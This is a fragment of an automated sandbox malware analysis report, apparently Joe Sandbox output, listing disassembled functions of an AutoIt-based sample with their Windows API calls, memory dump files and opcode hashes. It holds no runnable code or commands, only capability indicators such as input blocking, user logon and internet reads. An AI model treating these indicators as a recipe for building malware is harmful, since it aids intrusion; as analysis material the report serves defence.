                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                                                                                                • Opcode ID: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                                                                                                                                • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b82a98c6df9a243ef4fbf3c667c5144d50f68704456ba494e21579813087d3e5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                                                                                                                                                                                Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004339EB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 48322524-0
                                                                                                                                                                                                                • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                                                                                                                • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                                                                                                                                                                                Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                                                                                                                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                                                                                                                                                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 901099227-0
                                                                                                                                                                                                                • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                                                                                                                                                • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                                                                                                                                                                                Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Proc
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2346855178-0
                                                                                                                                                                                                                • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                                                                                                                • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                                                                                                                                                                                Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • BlockInput.USER32(00000001), ref: 0045A38B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BlockInput
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3456056419-0
                                                                                                                                                                                                                • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                                                                                                                • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                                                                                                                                                                                Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: LogonUser
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1244722697-0
                                                                                                                                                                                                                • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                                                                                                                • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                                                                                                                                                                                Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: NameUser
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2645101109-0
                                                                                                                                                                                                                • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                                                                                                                                • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                                                                                                                                                                                Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3192549508-0
                                                                                                                                                                                                                • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                                                                                                                • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                                                                                                                                                                                Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: N@
                                                                                                                                                                                                                • API String ID: 0-1509896676
                                                                                                                                                                                                                • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                                                                                                • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                                                                                                                                                                                Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                                                                                                                • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                                                                                                                                                                                Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                                • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                                                                                                                                                                                Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                                • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                                                                                                                                                                                Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                                • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                                                                                                                                                                                Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 0045953B
                                                                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00459551
                                                                                                                                                                                                                • DestroyWindow.USER32(?), ref: 00459563
                                                                                                                                                                                                                • GetDesktopWindow.USER32 ref: 00459581
                                                                                                                                                                                                                • GetWindowRect.USER32(00000000), ref: 00459588
                                                                                                                                                                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                                                                                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                                                                                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                                                                                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                                                                                                                                                                                • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004597E2
